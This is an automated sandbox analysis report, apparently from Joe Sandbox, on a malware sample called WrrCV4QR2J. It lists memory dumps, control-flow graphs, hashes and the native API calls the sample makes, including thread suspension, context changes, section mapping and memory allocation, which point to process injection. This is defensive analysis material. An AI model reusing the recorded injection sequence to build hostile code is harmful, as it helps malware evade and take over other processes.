                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:1.8%
                                                                                                                                                              Signature Coverage:11.1%
                                                                                                                                                              Total number of Nodes:397
                                                                                                                                                              Total number of Limit Nodes:35
88518 40a062 NtGetContextThread 88520 40a07d 88518->88520 88519->88518 88520->88424 88523 40a145 88521->88523 88522 40a262 NtSetContextThread 88524 40a27d 88522->88524 88523->88522 88524->88434 88526 427b07 88525->88526 88527 427b39 88525->88527 88529 429463 LdrLoadDll 88526->88529 88528 429463 LdrLoadDll 88527->88528 88530 427b4f 88528->88530 88531 427b21 88529->88531 88530->88442 88534 40b213 88531->88534 88533 427b32 88533->88442 88537 40b235 88534->88537 88535 40b352 NtDelayExecution 88536 40b36e 88535->88536 88536->88533 88537->88535 88540 40a345 88538->88540 88539 40a462 NtResumeThread 88541 40a47d 88539->88541 88540->88539 88541->88451

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID: %o@$%o@
                                                                                                                                                              • API String ID: 947044025-618112537
                                                                                                                                                              • Opcode ID: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                                                                                                              • Instruction ID: a180d3cde8570c79af263549b5a123663d1f596594efc184d6facc428f3df757
                                                                                                                                                              • Opcode Fuzzy Hash: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                                                                                                              • Instruction Fuzzy Hash: EA715D75E04258DFCB04CFA9D484AEDBBF1BF49304F1880AAE459B7341D238A952DF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 100 40a733-40a74f 101 40a755-40a794 call 4097d3 100->101 102 40a750 call 4097c3 100->102 105 40a872-40a89b NtCreateSection 101->105 106 40a79a-40a7df call 409863 call 42b882 call 409733 call 42b882 101->106 102->101 108 40a8a1-40a8a8 105->108 109 40a938-40a944 105->109 128 40a7ea-40a7f0 106->128 111 40a8b3-40a8b9 108->111 113 40a8e1-40a8e5 111->113 114 40a8bb-40a8df 111->114 117 40a927-40a935 call 409863 113->117 118 40a8e7-40a8ee 113->118 114->111 117->109 120 40a8f9-40a8ff 118->120 120->117 123 40a901-40a925 120->123 123->120 129 40a7f2-40a816 128->129 130 40a818-40a81c 128->130 129->128 130->105 132 40a81e-40a839 130->132 133 40a844-40a84a 132->133 133->105 134 40a84c-40a870 133->134 134->133
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateSection
                                                                                                                                                              • String ID: An@
                                                                                                                                                              • API String ID: 2449625523-62601564
                                                                                                                                                              • Opcode ID: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                                                                                                              • Instruction ID: 41a694da47314c6f7953bebff27000536f1853d4fe1618860b860f471416e69f
                                                                                                                                                              • Opcode Fuzzy Hash: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                                                                                                              • Instruction Fuzzy Hash: 36713BB1E04258DFCB04DFA9C490AEDBBF5BF49304F18816AE859B7341D238AA52CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 145 40ab73-40abd4 call 4097c3 call 4097d3 150 40acb2-40aceb NtCreateFile 145->150 151 40abda-40ac1f call 409863 call 42b882 call 409733 call 42b882 145->151 153 40acf1-40acf8 150->153 154 40ad88-40ad94 150->154 173 40ac2a-40ac30 151->173 156 40ad03-40ad09 153->156 158 40ad31-40ad35 156->158 159 40ad0b-40ad2f 156->159 162 40ad77-40ad85 call 409863 158->162 163 40ad37-40ad3e 158->163 159->156 162->154 164 40ad49-40ad4f 163->164 164->162 167 40ad51-40ad75 164->167 167->164 174 40ac32-40ac56 173->174 175 40ac58-40ac5c 173->175 174->173 175->150 177 40ac5e-40ac79 175->177 178 40ac84-40ac8a 177->178 178->150 179 40ac8c-40acb0 178->179 179->178
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                                                                                                              • Instruction ID: 1c07fbbcbdb6f1aea2f7691a6cf0475e8e686830d361e3a4b3f409b1fbea8beb
                                                                                                                                                              • Opcode Fuzzy Hash: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                                                                                                              • Instruction Fuzzy Hash: BB814DB1E14258DFCB04CFA9C490AEDBBF5AF4D304F18816AE859B7341D238A952CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 181 40a953-40a9b4 call 4097c3 call 4097d3 186 40aa92-40aac7 NtMapViewOfSection 181->186 187 40a9ba-40a9ff call 409863 call 42b882 call 409733 call 42b882 181->187 189 40ab64-40ab70 186->189 190 40aacd-40aad4 186->190 209 40aa0a-40aa10 187->209 192 40aadf-40aae5 190->192 194 40aae7-40ab0b 192->194 195 40ab0d-40ab11 192->195 194->192 198 40ab53-40ab61 call 409863 195->198 199 40ab13-40ab1a 195->199 198->189 201 40ab25-40ab2b 199->201 201->198 204 40ab2d-40ab51 201->204 204->201 210 40aa12-40aa36 209->210 211 40aa38-40aa3c 209->211 210->209 211->186 213 40aa3e-40aa59 211->213 214 40aa64-40aa6a 213->214 214->186 215 40aa6c-40aa90 214->215 215->214
                                                                                                                                                              APIs
                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SectionView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                                              • Opcode ID: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                                                                                                              • Instruction ID: 8c108c30a1503a35fa8a721594d6fd6207328e0511ed23d5626443ae9fe78b90
                                                                                                                                                              • Opcode Fuzzy Hash: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                                                                                                              • Instruction Fuzzy Hash: FE713A71E04258DFCB04CFA9C590AEDBBF6AF4D304F18816AE459B7381D238A952CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 217 40ada3-40adbf 218 40adc5-40ae04 call 4097d3 217->218 219 40adc0 call 4097c3 217->219 222 40aee2-40af13 NtReadFile 218->222 223 40ae0a-40ae4f call 409863 call 42b882 call 409733 call 42b882 218->223 219->218 225 40afb0-40afbc 222->225 226 40af19-40af20 222->226 245 40ae5a-40ae60 223->245 228 40af2b-40af31 226->228 230 40af33-40af57 228->230 231 40af59-40af5d 228->231 230->228 234 40af9f-40afad call 409863 231->234 235 40af5f-40af66 231->235 234->225 238 40af71-40af77 235->238 238->234 241 40af79-40af9d 238->241 241->238 246 40ae62-40ae86 245->246 247 40ae88-40ae8c 245->247 246->245 247->222 249 40ae8e-40aea9 247->249 250 40aeb4-40aeba 249->250 250->222 251 40aebc-40aee0 250->251 251->250
                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                                                                                                              • Instruction ID: fc9d2199742c9a8d060674d21e47953af395a2044174ee8fd2e3237901ead3e6
                                                                                                                                                              • Opcode Fuzzy Hash: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                                                                                                              • Instruction Fuzzy Hash: DB713DB1E14258DFCB04CFA9C490AEDBBF5BF4D304F18816AE459B7341D234A952CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 253 40b623-40b684 call 4097c3 call 4097d3 258 40b762-40b787 NtAllocateVirtualMemory 253->258 259 40b68a-40b6cf call 409863 call 42b882 call 409733 call 42b882 253->259 261 40b824-40b830 258->261 262 40b78d-40b794 258->262 281 40b6da-40b6e0 259->281 264 40b79f-40b7a5 262->264 265 40b7a7-40b7cb 264->265 266 40b7cd-40b7d1 264->266 265->264 269 40b813-40b821 call 409863 266->269 270 40b7d3-40b7da 266->270 269->261 272 40b7e5-40b7eb 270->272 272->269 275 40b7ed-40b811 272->275 275->272 282 40b6e2-40b706 281->282 283 40b708-40b70c 281->283 282->281 283->258 284 40b70e-40b729 283->284 286 40b734-40b73a 284->286 286->258 287 40b73c-40b760 286->287 287->286
                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 361 40a123-40a184 call 4097c3 call 4097d3 366 40a262-40a277 NtSetContextThread 361->366 367 40a18a-40a1cf call 409863 call 42b882 call 409733 call 42b882 361->367 369 40a314-40a320 366->369 370 40a27d-40a284 366->370 389 40a1da-40a1e0 367->389 372 40a28f-40a295 370->372 373 40a297-40a2bb 372->373 374 40a2bd-40a2c1 372->374 373->372 377 40a303-40a311 call 409863 374->377 378 40a2c3-40a2ca 374->378 377->369 381 40a2d5-40a2db 378->381 381->377 384 40a2dd-40a301 381->384 384->381 390 40a1e2-40a206 389->390 391 40a208-40a20c 389->391 390->389 391->366 393 40a20e-40a229 391->393 394 40a234-40a23a 393->394 394->366 395 40a23c-40a260 394->395 395->394
                                                                                                                                                              APIs
                                                                                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1591575202-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 397 40b213-40b22f 398 40b235-40b274 call 4097d3 397->398 399 40b230 call 4097c3 397->399 402 40b352-40b368 NtDelayExecution 398->402 403 40b27a-40b2bf call 409863 call 42b882 call 409733 call 42b882 398->403 399->398 404 40b405-40b411 402->404 405 40b36e-40b375 402->405 425 40b2ca-40b2d0 403->425 407 40b380-40b386 405->407 409 40b388-40b3ac 407->409 410 40b3ae-40b3b2 407->410 409->407 414 40b3f4-40b402 call 409863 410->414 415 40b3b4-40b3bb 410->415 414->404 417 40b3c6-40b3cc 415->417 417->414 420 40b3ce-40b3f2 417->420 420->417 426 40b2d2-40b2f6 425->426 427 40b2f8-40b2fc 425->427 426->425 427->402 428 40b2fe-40b319 427->428 430 40b324-40b32a 428->430 430->402 431 40b32c-40b350 430->431 431->430
                                                                                                                                                              APIs
                                                                                                                                                              • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DelayExecution
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1249177460-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 289 409d23-409d84 call 4097c3 call 4097d3 294 409e62-409e77 NtSuspendThread 289->294 295 409d8a-409dcf call 409863 call 42b882 call 409733 call 42b882 289->295 296 409f14-409f20 294->296 297 409e7d-409e84 294->297 317 409dda-409de0 295->317 299 409e8f-409e95 297->299 302 409e97-409ebb 299->302 303 409ebd-409ec1 299->303 302->299 306 409f03-409f11 call 409863 303->306 307 409ec3-409eca 303->307 306->296 310 409ed5-409edb 307->310 310->306 311 409edd-409f01 310->311 311->310 318 409de2-409e06 317->318 319 409e08-409e0c 317->319 318->317 319->294 320 409e0e-409e29 319->320 322 409e34-409e3a 320->322 322->294 323 409e3c-409e60 322->323 323->322
                                                                                                                                                              APIs
                                                                                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SuspendThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3178671153-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 325 409f23-409f84 call 4097c3 call 4097d3 330 40a062-40a077 NtGetContextThread 325->330 331 409f8a-409fcf call 409863 call 42b882 call 409733 call 42b882 325->331 333 40a114-40a120 330->333 334 40a07d-40a084 330->334 353 409fda-409fe0 331->353 335 40a08f-40a095 334->335 337 40a097-40a0bb 335->337 338 40a0bd-40a0c1 335->338 337->335 341 40a103-40a111 call 409863 338->341 342 40a0c3-40a0ca 338->342 341->333 345 40a0d5-40a0db 342->345 345->341 348 40a0dd-40a101 345->348 348->345 354 409fe2-40a006 353->354 355 40a008-40a00c 353->355 354->353 355->330 356 40a00e-40a029 355->356 358 40a034-40a03a 356->358 358->330 359 40a03c-40a060 358->359 359->358
                                                                                                                                                              APIs
                                                                                                                                                              • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1591575202-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 433 4173f3-41740f 434 417417-41741c 433->434 435 417412 call 42af83 433->435 436 417422-417430 call 42b4a3 434->436 437 41741e-417421 434->437 435->434 440 417440-417451 call 429943 436->440 441 417432-41743d call 42b723 436->441 446 417453-417467 LdrLoadDll 440->446 447 41746a-41746d 440->447 441->440 446->447
                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 36 413a8d-413a90 37 413b01-413b02 36->37 38 413a92 36->38 39 413a93-413aa2 38->39 40 413ac9-413aca 38->40 41 413aa4-413aac 39->41 42 413a4f-413a52 39->42 40->39 43 413acc-413ace 40->43 44 413adf 41->44 43->44 45 413af4-413b42 43->45 47 413ae1-413ae6 44->47 48 413ae8-413aee 44->48 49 413b54-413b5d 45->49 50 413b44-413b4c 45->50 47->48 51 413af0-413af3 48->51 52 413b6f-413b8b 48->52 49->52 50->49 51->45 53 413bfd-413c5d call 42a323 call 42ad33 call 4173f3 call 4046e3 call 423e53 52->53 54 413b8d-413bea 52->54 68 413c7d-413c83 53->68 69 413c5f-413c6e PostThreadMessageW 53->69 69->68 70 413c70-413c7a 69->70 70->68
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 0-4105805501
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 71 413beb-413c05 73 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 71->73 74 413c08 call 42a323 71->74 83 413c7d-413c83 73->83 84 413c5f-413c6e PostThreadMessageW 73->84 74->73 84->83 85 413c70-413c7a 84->85 85->83
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 1836367815-4105805501
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 86 413bf3-413c05 87 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 86->87 88 413c08 call 42a323 86->88 97 413c7d-413c83 87->97 98 413c5f-413c6e PostThreadMessageW 87->98 88->87 98->97 99 413c70-413c7a 98->99 99->97
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 1836367815-4105805501
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
